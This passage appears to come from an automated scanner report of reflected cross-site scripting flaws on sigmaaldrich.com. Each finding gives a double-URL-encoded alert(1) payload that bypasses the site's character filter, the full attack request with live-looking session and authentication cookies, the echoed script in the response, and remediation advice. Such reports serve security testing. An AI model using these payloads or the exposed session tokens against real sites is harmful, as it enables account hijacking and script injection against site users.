The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2709f%2522%253balert%25281%2529%252f%252f9678c1644d6 was submitted in the REST URL parameter 6. This input was echoed as 2709f";alert(1)//9678c1644d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog2709f%2522%253balert%25281%2529%252f%252f9678c1644d6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog2709f";alert(1)//9678c1644d6","E404") ;
   </script>
...[SNIP]...

1.94. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b13e8%2522%253balert%25281%2529%252f%252f355ca655f70 was submitted in the REST URL parameter 1. This input was echoed as b13e8";alert(1)//355ca655f70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentb13e8%2522%253balert%25281%2529%252f%252f355ca655f70/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentb13e8";alert(1)//355ca655f70/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.95. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaa45%2522%253balert%25281%2529%252f%252ff70af8ceeb6 was submitted in the REST URL parameter 2. This input was echoed as eaa45";alert(1)//f70af8ceeb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldricheaa45%2522%253balert%25281%2529%252f%252ff70af8ceeb6/areas-of-interest/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldricheaa45";alert(1)//f70af8ceeb6/areas-of-interest/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.96. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e060%2522%253balert%25281%2529%252f%252f6f78925408c was submitted in the REST URL parameter 3. This input was echoed as 6e060";alert(1)//6f78925408c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest6e060%2522%253balert%25281%2529%252f%252f6f78925408c/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest6e060";alert(1)//6f78925408c/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.97. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c1b7%2522%253balert%25281%2529%252f%252fa5911bef3e6 was submitted in the REST URL parameter 4. This input was echoed as 8c1b7";alert(1)//a5911bef3e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry8c1b7%2522%253balert%25281%2529%252f%252fa5911bef3e6/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry8c1b7";alert(1)//a5911bef3e6/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.98. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7c82%2522%253balert%25281%2529%252f%252f18170b86b7a was submitted in the REST URL parameter 5. This input was echoed as e7c82";alert(1)//18170b86b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

